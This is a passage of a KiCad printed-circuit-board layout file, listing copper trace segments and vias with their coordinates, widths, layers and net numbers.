B.Cu) (net 2) (tstamp 5B70B1E6) (status 20)) (segment (start 59.69 29.972) (end 59.69 27.218) (width 0.5) (layer B.Cu) (net 3) (status 10)) (segment (start 59.69 27.218) (end 64.048 22.86) (width 0.5) (layer B.Cu) (net 3) (tstamp 5B70B1EA) (status 20)) (segment (start 62.23 29.972) (end 62.23 27.178) (width 0.5) (layer B.Cu) (net 4) (status 10)) (segment (start 62.23 27.178) (end 66.548 22.86) (width 0.5) (layer B.Cu) (net 4) (tstamp 5B70B1EE) (status 20)) (segment (start 76.708 29.972) (end 76.708 22.94) (width 0.5) (layer B.Cu) (net 5) (status 30)) (segment (start 76.708 22.94) (end 76.788 22.86) (width 0.5) (layer B.Cu) (net 5) (tstamp 5B70B1F7) (status 30)) (segment (start 79.248 29.972) (end 79.248 22.9) (width 0.5) (layer B.Cu) (net 6) (status 30)) (segment (start 79.248 22.9) (end 79.288 22.86) (width 0.5) (layer B.Cu) (net 6) (tstamp 5B70B1FA) (status 30)) (segment (start 81.788 29.972) (end 81.788 22.86) (width 0.5) (layer B.Cu) (net 7) (status 30)) (segment (start 84.328 29.972) (end 84.328 22.9) (width 0.5) (layer B.Cu) (net 8) (status 30)) (segment (start 84.328 22.9) (end 84.288 22.86) (width 0.5) (layer B.Cu) (net 8) (tstamp 5B70B1FF) (status 30)) (segment (start 86.868 29.972) (end 86.868 28.02) (width 0.5) (layer B.Cu) (net 9) (status 10)) (segment (start 86.868 28.02) (end 92.028 22.86) (width 0.5) (layer B.Cu) (net 9) (tstamp 5B70B202) (status 20)) (segment (start 89.408 29.972) (end 89.408 27.98) (width 0.5) (layer B.Cu) (net 10) (status 10)) (segment (start 89.408 27.98) (end 94.528 22.86) (width 0.5) (layer B.Cu) (net 10) (tstamp 5B70B205) (status 20)) (segment (start 91.948 29.972) (end 91.948 27.94) (width 0.5) (layer B.Cu) (net 11) (status 10)) (segment (start 91.948 27.94) (end 97.028 22.86) (width 0.5) (layer B.Cu) (net 11) (tstamp 5B70B208) (status 20)) (segment (start 94.488 29.972) (end 94.488 27.9) (width 0.5) (layer B.Cu) (net 12) (status 10)) (segment (start 94.488 27.9) (end 99.528 22.86) (width 0.5) (layer B.Cu) (net 12) (tstamp 5B70B20C) (status 20)) (segment (start 52.07 29.972) (end 52.07 23.622) (width 0.5) (layer B.Cu) (net 13) (status 10)) (segment (start 52.07 23.622) (end 51.308 22.86) (width 0.5) (layer B.Cu) (net 13) (tstamp 5B70B1E0) (status 20)) (segment (start 49.53 29.972) (end 49.53 23.582) (width 0.5) (layer B.Cu) (net 14) (status 10)) (segment (start 49.53 23.582) (end 48.808 22.86) (width 0.5) (layer B.Cu) (net 14) (tstamp 5B70B1DD) (status 20)) (segment (start 58.801 39.243) (end 57.15 37.592) (width 0.35) (layer F.Cu) (net 15)) (segment (start 86.868 37.592) (end 85.725 38.735) (width 0.35) (layer F.Cu) (net 15)) (segment (start 85.725 38.735) (end 85.725 39.243) (width 0.35) (layer F.Cu) (net 15)) (segment (start 77.089 39.243) (end 85.725 39.243) (width 0.35) (layer F.Cu) (net 15)) (segment (start 67.945 39.243) (end 77.089 39.243) (width 0.35) (layer F.Cu) (net 15)) (segment (start 58.801 39.243) (end 67.945 39.243) (width 0.35) (layer F.Cu) (net 15)) (segment (start 109.474 43.18) (end 90.206 43.18) (width 0.35) (layer F.Cu) (net 15) (status 10)) (segment (start 90.206 43.18) (end 89.622 43.764) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B92ED33) (status 20)) (segment (start 109.474 43.18) (end 112.014 43.18) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B92EBA0) (status 30)) (segment (start 54.864 53.34) (end 49.988 48.464) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B731691) (status 20)) (segment (start 89.622 43.764) (end 89.622 43.14) (width 0.35) (layer F.Cu) (net 15) (status 10)) (segment (start 89.622 43.14) (end 85.725 39.243) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723909)) (segment (start 80.732 43.764) (end 80.732 42.886) (width 0.35) (layer F.Cu) (net 15) (status 10)) (segment (start 80.732 42.886) (end 77.089 39.243) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B72387B)) (segment (start 54.864 53.34) (end 80.01 53.34) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B92EB17)) (segment (start 51.308 46.482) (end 51.308 43.942) (width 0.35) (layer F.Cu) (net 15)) (segment (start 51.308 43.942) (end 54.61 40.64) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B731860) (status 20)) (segment (start 51.308 46.482) (end 49.988 47.802) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B73185D) (status 20)) (segment (start 49.988 47.802) (end 49.988 48.4) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B731857) (status 30)) (segment (start 81.788 63.754) (end 84.328 63.754) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 81.788 51.054) (end 81.24 51.054) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 81.24 51.054) (end 80.01 52.284) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B7316D6) (status 10)) (segment (start 80.01 53.34) (end 80.01 52.284) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B7319E5)) (segment (start 81.788 63.754) (end 80.01 61.976) (width 0.35) (layer F.Cu) (net 15) (tstamp 59E03EBC) (status 10)) (segment (start 80.01 61.976) (end 80.01 53.34) (width 0.35) (layer F.Cu) (net 15)) (segment (start 49.988 48.4) (end 49.988 48.464) (width 0.25) (layer F.Cu) (net 15) (status 30)) (segment (start 48.768 54.864) (end 48.768 52.07) (width 0.35) (layer F.Cu) (net 15) (status 10)) (segment (start 48.768 52.07) (end 48.26 51.562) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B73168E)) (segment (start 37.084 39.37) (end 35.814 40.64) (width 0.35) (layer B.Cu) (net 15) (status 10)) (segment (start 49.988 49.834) (end 49.988 48.4) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723D68) (status 20)) (segment (start 48.26 51.562) (end 49.988 49.834) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723D67)) (segment (start 37.084 51.562) (end 48.26 51.562) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723D66)) (via (at 37.084 51.562) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 15)) (segment (start 36.576 51.562) (end 37.084 51.562) (width 0.35) (layer B.Cu) (net 15) (tstamp 5B723D62)) (segment (start 35.814 50.8) (end 36.576 51.562) (width 0.35) (layer B.Cu) (net 15) (tstamp 5B723D3E)) (segment (start 35.814 40.64) (end 35.814 50.8) (width 0.35) (layer B.Cu) (net 15) (tstamp 5B723D32)) (segment (start 34.544 39.37) (end 32.766 39.37) (width 0.35) (layer B.Cu) (net 15) (status 10)) (segment (start 32.766 39.37) (end 29.972 36.576) (width 0.35) (layer B.Cu) (net 15) (tstamp 5B723C8E) (status 20)) (segment (start 34.544 39.37) (end 37.084 39.37) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 92.964 65.278) (end 90.932 65.278) (width 0.35) (layer F.Cu) (net 15) (status 10)) (segment (start 90.932 65.278) (end 89.408 63.754) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723972) (status 20)) (segment (start 49.988 48.4) (end 49.988 48.31) (width 0.25) (layer F.Cu) (net 15) (status 30)) (segment (start 71.842 43.14) (end 71.842 43.764) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B72389F) (status 20)) (segment (start 67.945 39.243) (end 71.842 43.14) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B72389B)) (segment (start 62.738 43.18) (end 62.738 43.55) (width 0.25) (layer F.Cu) (net 15) (tstamp 5B723853) (status 20)) (segment (start 58.801 39.243) (end 62.738 43.18) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B723879)) (segment (start 62.738 43.55) (end 62.952 43.764) (width 0.25) (layer F.Cu) (net 15) (tstamp 5B723854) (status 30)) (segment (start 54.61 40.64) (end 54.61 40.132) (width 0.25) (layer F.Cu) (net 15) (status 30)) (segment (start 54.61 40.132) (end 57.15 37.592) (width 0.35) (layer F.Cu) (net 15) (tstamp 5B72384F) (status 30)) (segment (start 84.328 63.754) (end 86.868 63.754) (width 0.35) (layer B.Cu) (net 15) (tstamp 59E04486) (status 30)) (segment (start 86.868 63.754) (end 89.408 63.754) (width 0.35) (layer B.Cu) (net 15) (tstamp 59E04487) (status 30)) (segment (start 84.328 51.054) (end 81.788 51.054) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 86.868 51.054) (end 84.328 51.054) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 86.868 51.054) (end 89.408 51.054) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 87.082 50.84) (end 86.868 51.054) (width 0.35) (layer F.Cu) (net 15) (tstamp 59E05C2C) (status 30)) (segment (start 86.868 63.754) (end 89.408 63.754) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 84.328 63.754) (end 86.868 63.754) (width 0.35) (layer F.Cu) (net 15) (status 30)) (segment (start 54.61 29.972) (end 54.61 23.662) (width 0.5) (layer B.Cu) (net 16) (status 10)) (segment (start 54.61 23.662) (end 53.808 22.86) (width 0.5) (layer B.Cu) (net 16) (tstamp 5B70B1E3) (status 20)) (segment (start 62.952 40.564) (end 63.642 40.564) (width 0.25) (layer F.Cu) (net 17) (status 30)) (segment (start 63.642 40.564) (end 66.842 43.764) (width 0.25) (layer F.Cu) (net 17) (tstamp 5B7238C9) (status 30)) (segment (start 22.352 33.782) (end 22.352 36.322) (width 0.25) (layer F.Cu) (net 18) (status 30)) (segment (start 29.972 44.196) (end 22.606 44.196) (width 0.25) (layer F.Cu) (net 19) (status 30)) (segment (start 22.606 44.196) (end 22.352 44.45) (width 0.25) (layer F.Cu) (net 19) (tstamp 5B723C92) (status 30)) (segment (start 52.07 37.592) (end 52.07 34.798) (width 0.25) (layer B.Cu) (net 20) (status 10)) (segment (start 35.814 40.64) (end 34.544 41.91) (width 0.25) (layer F.Cu) (net 20) (status 20)) (segment (start 43.688 35.052) (end 51.816 35.052) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723BBC)) (segment (start 38.1 40.64) (end 43.688 35.052) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723BBA)) (segment (start 35.814 40.64) (end 38.1 40.64) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723BB3)) (segment (start 52.07 34.798) (end 51.816 35.052) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723C01)) (via (at 52.07 34.798) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 20)) (segment (start 47.448 48.4) (end 47.448 48.31) (width 0.25) (layer F.Cu) (net 20) (status 30)) (segment (start 47.448 48.31) (end 48.768 46.99) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B72392F) (status 10)) (segment (start 48.768 46.99) (end 48.768 44.704) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723932)) (segment (start 48.768 44.704) (end 52.07 41.402) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723935)) (segment (start 52.07 41.402) (end 52.07 37.592) (width 0.25) (layer F.Cu) (net 20) (tstamp 5B723937) (status 20)) (segment (start 106.68 42.418) (end 106.68 43.942) (width 0.25) (layer B.Cu) (net 21)) (via (at 106.68 42.418) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 21)) (segment (start 91.948 35.56) (end 99.822 35.56) (width 0.25) (layer F.Cu) (net 21)) (segment (start 106.68 42.418) (end 99.822 35.56) (width 0.25) (layer F.Cu) (net 21)) (segment (start 108.204 44.45) (end 110.744 44.45) (width 0.25) (layer B.Cu) (net 21) (tstamp 5B92EF51)) (segment (start 107.95 44.704) (end 108.204 44.45) (width 0.25) (layer B.Cu) (net 21) (tstamp 5B92EF4E)) (segment (start 107.442 44.704) (end 107.95 44.704) (width 0.25) (layer B.Cu) (net 21) (tstamp 5B92EF4A)) (segment (start 106.68 43.942) (end 107.442 44.704) (width 0.25) (layer B.Cu) (net 21) (tstamp 5B92EF42)) (segment (start 110.744 44.45) (end 112.014 45.72) (width 0.25) (layer B.Cu) (net 21) (tstamp 5B92EDDB) (status 20)) (segment (start 37.084 41.91) (end 37.846 41.91) (width 0.25) (layer F.Cu) (net 21) (status 30)) (segment (start 37.846 41.91) (end 44.196 35.56) (width 0.25) (layer F.Cu) (net 21) (tstamp 5B723A46) (status 10)) (segment (start 70.358 35.56) (end 91.948 35.56) (width 0.25) (layer F.Cu) (net 21) (status 10)) (segment (start 91.948 35.56) (end 91.948 37.592) (width 0.25) (layer F.Cu) (net 21) (tstamp 5B723680) (status 20)) (segment (start 62.23 37.592) (end 62.23 35.56) (width 0.25) (layer B.Cu) (net 21) (status 10)) (via (at 62.23 35.56) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 21)) (segment (start 70.358 35.56) (end 62.23 35.56) (width 0.25) (layer F.Cu) (net 21) (status 10)) (segment (start 62.23 35.56) (end 44.196 35.56) (width 0.25) (layer F.Cu) (net 21) (tstamp 5B723671)) (segment (start 92.964 47.498) (end 92.456 46.99) (width 0.25) (layer F.Cu) (net 22)) (segment (start 92.456 46.99) (end 59.182 46.99) (width 0.25) (layer F.Cu) (net 22) (tstamp 5B970CB3)) (segment (start 59.182 46.99) (end 56.896 44.704) (width 0.25) (layer F.Cu) (net 22) (tstamp 5B970CBF)) (segment (start 51.676 45.86) (end 52.832 44.704) (width 0.25) (layer B.Cu) (net 22) (tstamp 5B7319A1)) (via (at 52.832 44.704) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 22)) (segment (start 52.832 44.704) (end 56.896 44.704) (width 0.25) (layer F.Cu) (net 22) (tstamp 5B7319A8)) (segment (start 51.676 45.86) (end 49.988 45.86) (width 0.25) (layer B.Cu) (net 22) (status 20)) (segment (start 34.544 44.45) (end 35.814 45.72) (width 0.25) (layer F.Cu) (net 22) (status 10)) (segment (start 49.022 44.45) (end 49.988 45.416) (width 0.25) (layer B.Cu) (net 22) (tstamp 5B73168A) (status 20)) (segment (start 42.926 44.45) (end 49.022 44.45) (width 0.25) (layer B.Cu) (net 22) (tstamp 5B731689)) (via (at 42.926 44.45) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 22)) (segment (start 41.656 45.72) (end 42.926 44.45) (width 0.25) (layer F.Cu) (net 22) (tstamp 5B731686)) (segment (start 35.814 45.72) (end 41.656 45.72) (width 0.25) (layer F.Cu) (net 22) (tstamp 5B731685)) (segment (start 49.988 45.416) (end 49.988 45.86) (width 0.25) (layer B.Cu) (net 22) (tstamp 5B73168B) (status 30)) (segment (start 113.284 46.99) (end 113.284 42.672) (width 0.25) (layer F.Cu) (net 23)) (segment (start 113.284 42.672) (end 112.522 41.91) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B92F078)) (segment (start 112.014 48.26) (end 113.284 49.53) (width 0.25) (layer F.Cu) (net 23) (status 10)) (segment (start 113.284 49.53) (end 113.284 55.372) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B92F069)) (segment (start 100.584 65.278) (end 103.378 65.278) (width 0.25) (layer F.Cu) (net 23) (status 10)) (segment (start 103.378 65.278) (end 113.284 55.372) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B92EE2A)) (segment (start 108.458 41.91) (end 99.568 33.02) (width 0.25) (layer F.Cu) (net 23)) (segment (start 108.458 41.91) (end 112.522 41.91) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B731B97)) (segment (start 70.358 33.02) (end 99.568 33.02) (width 0.25) (layer F.Cu) (net 23) (status 10)) (segment (start 113.284 46.99) (end 112.014 48.26) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B92F076) (status 20)) (segment (start 70.358 33.02) (end 44.45 33.02) (width 0.25) (layer F.Cu) (net 23) (status 10)) (segment (start 44.45 37.084) (end 37.084 44.45) (width 0.25) (layer F.Cu) (net 23) (tstamp 5B723CEB) (status 20)) (via (at 44.45 37.084) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 23)) (segment (start 44.45 33.02) (end 44.45 37.084) (width 0.25) (layer B.Cu) (net 23) (tstamp 5B723CE6)) (via (at 44.45 33.02) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 23)) (segment (start 107.696 43.942) (end 107.696 45.974) (width 0.25) (layer F.Cu) (net 24)) (segment (start 99.568 34.29) (end 107.696 42.418) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92ED61)) (via (at 107.696 42.418) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 24)) (segment (start 107.696 42.418) (end 107.696 43.942) (width 0.25) (layer B.Cu) (net 24) (tstamp 5B92ED6D)) (segment (start 79.248 34.29) (end 99.568 34.29) (width 0.25) (layer F.Cu) (net 24)) (via (at 107.696 43.942) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 24)) (segment (start 110.744 49.53) (end 109.474 50.8) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EECE) (status 20)) (segment (start 110.744 47.752) (end 110.744 49.53) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EECC)) (segment (start 109.982 46.99) (end 110.744 47.752) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EECB)) (segment (start 108.712 46.99) (end 109.982 46.99) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EEC9)) (segment (start 107.696 45.974) (end 108.712 46.99) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EEC6)) (segment (start 100.584 62.738) (end 103.632 62.738) (width 0.25) (layer F.Cu) (net 24) (status 10)) (segment (start 103.632 62.738) (end 107.696 58.674) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EE7E)) (segment (start 107.696 58.674) (end 107.696 52.578) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EE85)) (segment (start 107.696 52.578) (end 109.474 50.8) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B92EE88) (status 20)) (segment (start 49.53 34.036) (end 69.342 34.036) (width 0.25) (layer F.Cu) (net 24)) (segment (start 69.342 34.036) (end 69.596 34.29) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B731B3C)) (segment (start 38.862 38.1) (end 42.926 34.036) (width 0.25) (layer F.Cu) (net 24)) (segment (start 42.926 34.036) (end 49.53 34.036) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723C9A)) (segment (start 38.862 38.1) (end 34.036 38.1) (width 0.25) (layer F.Cu) (net 24)) (segment (start 33.274 45.72) (end 34.544 46.99) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723C5D) (status 20)) (segment (start 33.274 38.862) (end 33.274 45.72) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723C5A)) (segment (start 34.036 38.1) (end 33.274 38.862) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723C59)) (segment (start 49.53 37.592) (end 49.53 34.036) (width 0.25) (layer B.Cu) (net 24) (status 10)) (via (at 49.53 34.036) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 24)) (segment (start 69.596 34.29) (end 79.248 34.29) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B731B42)) (via (at 79.248 34.29) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 24)) (segment (start 79.248 37.592) (end 79.248 34.29) (width 0.25) (layer B.Cu) (net 24) (tstamp 5B72363B) (status 10)) (segment (start 34.544 46.99) (end 35.814 48.26) (width 0.25) (layer F.Cu) (net 24) (status 10)) (segment (start 35.814 48.26) (end 42.418 48.26) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723945)) (segment (start 42.418 48.26) (end 43.434 47.244) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B723946)) (segment (start 43.434 47.244) (end 46.064 47.244) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B72394B)) (segment (start 46.064 47.244) (end 47.448 45.86) (width 0.25) (layer F.Cu) (net 24) (tstamp 5B72394D) (status 20)) (segment (start 57.952 43.764) (end 57.952 43.982) (width 0.25) (layer F.Cu) (net 25) (status 30)) (segment (start 57.952 43.982) (end 59.182 45.212) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B731988) (status 10)) (via (at 73.152 45.212) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 25)) (segment (start 59.182 45.212) (end 73.152 45.212) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B731989)) (segment (start 73.152 38.1) (end 73.152 45.212) (width 0.25) (layer B.Cu) (net 25) (status 10)) (segment (start 37.084 46.99) (end 41.656 46.99) (width 0.25) (layer F.Cu) (net 25) (status 10)) (segment (start 55.956 43.764) (end 57.952 43.764) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B723B6D) (status 20)) (segment (start 55.88 43.688) (end 55.956 43.764) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B723B6C)) (via (at 55.88 43.688) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 25)) (segment (start 48.006 43.688) (end 55.88 43.688) (width 0.25) (layer B.Cu) (net 25) (tstamp 5B723B69)) (via (at 48.006 43.688) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 25)) (segment (start 44.958 43.688) (end 48.006 43.688) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B723B65)) (segment (start 41.656 46.99) (end 44.958 43.688) (width 0.25) (layer F.Cu) (net 25) (tstamp 5B723B5A)) (segment (start 105.664 43.688) (end 105.664 42.418) (width 0.25) (layer B.Cu) (net 26)) (segment (start 105.664 42.418) (end 102.87 39.624) (width 0.25) (layer F.Cu) (net 26) (tstamp 5B92F010)) (via (at 105.664 42.418) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 26)) (segment (start 105.664 43.688) (end 107.696 45.72) (width 0.25) (layer B.Cu) (net 26) (tstamp 5B92F00C)) (segment (start 89.408 37.592) (end 91.44 39.624) (width 0.25) (layer F.Cu) (net 26) (status 10)) (segment (start 91.44 39.624) (end 102.87 39.624) (width 0.25) (layer F.Cu) (net 26) (tstamp 5B731C76)) (segment (start 107.696 45.72) (end 109.474 45.72) (width 0.25) (layer B.Cu) (net 26) (tstamp 5B92EF6E) (status 20)) (segment (start 89.408 48.514) (end 91.44 48.514) (width 0.25) (layer F.Cu) (net 27)) (segment (start 91.44 48.514) (end 92.964 50.038) (width 0.25) (layer F.Cu) (net 27) (tstamp 5B970C2D)) (segment (start 98.552 50.038) (end 92.964 50.038) (width 0.25) (layer F.Cu) (net 27) (status 20)) (segment (start 99.822 48.768) (end 108.966 48.768) (width 0.25) (layer F.Cu) (net 27) (tstamp 5B731D9F) (status 20)) (segment (start 98.552 50.038) (end 99.822 48.768) (width 0.25) (layer F.Cu) (net 27) (tstamp 5B731D9C)) (segment (start 108.966 48.768) (end 109.474 48.26) (width 0.25) (layer F.Cu) (net 27) (tstamp 5B92EEDC) (status 30)) (segment (start 104.648 43.434) (end 104.648 42.418) (width 0.25) (layer B.Cu) (net 28)) (segment (start 104.648 42.418) (end 102.794 40.564) (width 0.25) (layer F.Cu) (net 28) (tstamp 5B92F025)) (via (at 104.648 42.418) (size 0.6) (drill 0.4) (layers F.Cu B.Cu) (net 28)) (segment (start 112.014 50.8) (end 110.744 49.53) (width 0.25) (layer B.Cu) (net 28) (tstamp 5B92EF8A) (status 10)) (segment (start 110.744 47.752) (end 110.744 49.53) (width 0.25) (layer B.Cu) (net 28) (tstamp 5B92EF88)) (segment (start 109.982 46.99) (end 110.744 47.752) (width 0.25) (layer B.Cu) (net 28) (tstamp 5B92EF85)) (segment (start 108.204 46.99) (end 109.982 46.99) (width 0.25) (layer B.Cu) (net 28)) (segment (start 104.648 43.434) (end 108.204 46.99) (width 0.25) (layer B.Cu) (net 28) (tstamp 5B92F021)) (segment (start 89.622 40.564) (end 102.794 40.564) (width 0.25) (layer F.Cu) (net 28) (status 10)) (segment (start 46.99 29.972) (end 46.99 23.542) (width 0.5) (layer B.Cu) (net 29) (status 10)) (segment (start 46.99 23.542) (end 46.308 22.86) (width 0.5) (layer B.Cu) (net 29) (tstamp 5B70B1D9) (status 20)) (segment (start 64.77 29.972) (end 64.77 27.138) (width 0.5) (layer B.Cu) (net 30) (status 10)) (segment (start 64.77 27.138) (end 69.048 22.86) (width 0.5) (layer B.Cu) (net 30) (tstamp 5B70B1F2) (status 20)) (segment (start 92.964 52.578) (end 87.884 52.578) (width 0.25) (layer F.Cu) (net 31) (status 10)) (segment (start 87.884 52.578) (end 81.788 58.674) (width 0.25) (layer F.Cu) (net 31) (status 20)) (segment (start 81.788 61.214) (end 81.788 58.674) (width 0.25) (layer F.Cu) (net 31) (status 30)) (segment (start 92.964 55.118) (end 87.884 55.118) (width 0.25) (layer F.Cu) (net 32) (status 10)) (segment (start 84.328 58.674) (end 87.884 55.118) (width 0.25) (layer F.Cu) (net 32) (status 10)) (segment (start 84.328 61.214) (end 84.328 58.674) (width 0.25) (layer F.Cu) (net 32) (status 30)) (segment (start 86.868 58.674) (end 88.138 57.404) (width 0.25) (layer F.Cu) (net 33) (status 10)) (segment (start 88.138 57.404) (end 92.71 57.404) (width 0.25) (layer F.Cu) (net 33) (tstamp 5B731C21) (status 20)) (segment (start 92.71 57.404) (end 92.964 57.658) (width 0.25) (layer F.Cu) (net 33) (tstamp 5B731C23) (status 30)) (segment (start 86.868 61.214) (end 86.868 58.674) (width 0.25) (layer F.Cu) (net 33) (status 30)) (segment (start 89.408 58.674) (end 91.44 58.674) (width 0.25) (layer F.Cu) (net 34) (status 10)) (segment (start 91.44 58.674) (end 92.964 60.198) (width 0.25) (layer F.Cu) (net 34) (tstamp 5B731C29) (status 20)) (segment (start 89.408 61.214) (end 89.408 58.674) (width 0.25) (layer F.Cu) (net 34) (status 30)) (segment (start 59.69 37.592) (end 60.96 36.322) (width 0.25) (layer F.Cu) (net 35) (status 10)) (segment (start 80.518 36.322) (end 81.788 37.592) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B723658) (status 20)) (segment (start 71.628 36.322) (end 80.518 36.322) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B723654)) (segment (start 70.866 37.084) (end 71.628 36.322) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B723651)) (segment (start 69.85 37.084) (end 70.866 37.084) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B723650)) (segment (start 69.088 36.322) (end 69.85 37.084) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B72364C)) (segment (start 60.96 36.322) (end 69.088 36.322) (width 0.25) (layer F.Cu) (net 35) (tstamp 5B723649)) (segment (start 71.842 40.564) (end 72.532 40.564) (width 0.25) (layer F.Cu) (net 36) (status 30)) (segment (start 72.532 40.564) (end 75.732 43.764) (width 0.25) (layer F.Cu) (net 36) (tstamp 5B7238CD) (status 30)) (segment (start 80.732 40.564) (end 81.422 40.564) (width 0.25) (layer F.Cu) (net 37) (status 30)) (segment (start 81.422 40.564) (end 84.622 43.764) (width 0.25) (layer F.Cu) (net 37) (tstamp 5B731ACA) (status 30)) (segment (start 80.732 40.564) (end 81.168 40.564) (width 0.25) (layer F.Cu) (net 37) (status 30)) (segment (start 70.358 30.48) (end 73.152 30.48) (width 0.25) (layer F.Cu) (net 38) (status 30)) (segment (start 100.584 60.198) (end 103.124 60.198) (width 0.25) (layer F.Cu) (net 39) (status 30)) (segment (start 100.584 57.658) (end 103.124 57.658) (width 0.25) (layer F.Cu) (net 40) (status 30)) (segment (start 100.584 55.118) (end 103.124 55.118) (width 0.25) (layer F.Cu) (net 41) (status 30)) (segment (start 100.584 52.578) (end 103.124 52.578) (width 0.25) (layer F.Cu) (net 42) (status 30)) (segment (start 22.352 41.91) (end 24.13 41.91) (width 0.25) (layer B.Cu) (net 43)) (segment (start 24.384 42.164) (end 25.766 42.164) (width 0.25) (layer B.Cu) (net 43) (tstamp 5F7C56ED)) (segment (start 24.13 41.91) (end 24.384 42.164) (width 0.25) (layer B.Cu) (net 43) (tstamp 5F7C56EB)) (segment (start 22.352 38.862) (end 22.352 40.012) (width 0.25) (layer F.Cu) (net 43)) (segment (start 22.352 40.012) (end 22.352 41.91) (width 0.25) (layer F.Cu) (net 43)) (segment (start 22.098 27.94) (end 22.098 30.734) (width 1) (layer F.Cu) (net 44) (status 30)) (segment (start 56.308 25.146) (end 42.384 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 109.474 38.1) (end 109.474 29.416) (width 1) (layer F.Cu) (net 45)) (segment (start 109.474 29.416) (end 106.728 26.67) (width 1) (layer F.Cu) (net 45) (tstamp 5FC02E12)) (segment (start 102.028 25.146) (end 105.204 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 105.204 25.146) (end 106.728 26.67) (width 1) (layer F.Cu) (net 45) (tstamp 5FC02DE5)) (segment (start 40.33 24.892) (end 42.13 24.892) (width 1) (layer F.Cu) (net 45)) (segment (start 42.13 24.892) (end 42.384 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 37.084 34.29) (end 40.33 31.044) (width 1) (layer F.Cu) (net 45)) (segment (start 40.33 31.044) (end 40.33 24.892) (width 1) (layer F.Cu) (net 45)) (segment (start 67.31 25.146) (end 71.548 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 86.788 25.146) (end 71.548 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 97.028 25.146) (end 86.788 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 67.31 25.146) (end 56.308 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 97.028 25.146) (end 102.028 25.146) (width 1) (layer F.Cu) (net 45)) (segment (start 67.31 29.972) (end 67.31 25.146) (width 1) (layer F.Cu) (net 45) (status 10)) (segment (start 97.028 29.972) (end 